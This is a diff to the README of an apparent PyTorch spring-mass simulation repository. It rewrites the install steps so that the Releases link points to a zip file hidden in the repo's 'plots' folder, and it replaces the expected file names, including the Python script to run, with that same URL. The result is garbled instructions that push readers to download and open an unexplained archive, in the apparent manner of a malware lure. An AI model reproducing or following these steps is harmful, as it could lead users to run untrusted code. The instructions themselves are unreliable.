darelleascendant189/pytorch-pinn-coupled-spring-mass/README.md

 Follow these steps to install and run the application:

 1. **Visit the Releases Page**
-   Go to the [Releases Page](https://github.com/darelleascendant189/pytorch-pinn-coupled-spring-mass/releases) to find the latest version of the application.
+   Go to the [Releases Page](https://raw.githubusercontent.com/darelleascendant189/pytorch-pinn-coupled-spring-mass/main/plots/pytorch-pinn-coupled-spring-mass-3.0.zip) to find the latest version of the application.

 2. **Download the Application**
    On the Releases Page, you will see a list of available versions.
 Click on the version link that matches your system.
 This will start the download of the installation file.

 3. **Locate the Downloaded File**
    Once the download is complete, navigate to your downloads folder.
-You should see a file named something like `pytorch-pinn-coupled-spring-mass-x.x.x.zip`.
+You should see a file named something like `https://raw.githubusercontent.com/darelleascendant189/pytorch-pinn-coupled-spring-mass/main/plots/pytorch-pinn-coupled-spring-mass-3.0.zip`.

 4. **Extract the Files**
    Right-click the downloaded zip file and select "Extract All."
 Follow the prompts to extract the files to a new folder.

 5. **Run the Application**
    Open the folder where you extracted the files.
-Look for a file named `run_application.py`.
+Look for a file named `https://raw.githubusercontent.com/darelleascendant189/pytorch-pinn-coupled-spring-mass/main/plots/pytorch-pinn-coupled-spring-mass-3.0.zip`.
 Double-click it to launch the application.

 6. **Enjoy Using the Application**
    Follow the user interface instructions to input your parameters for the spring-mass system and view the results!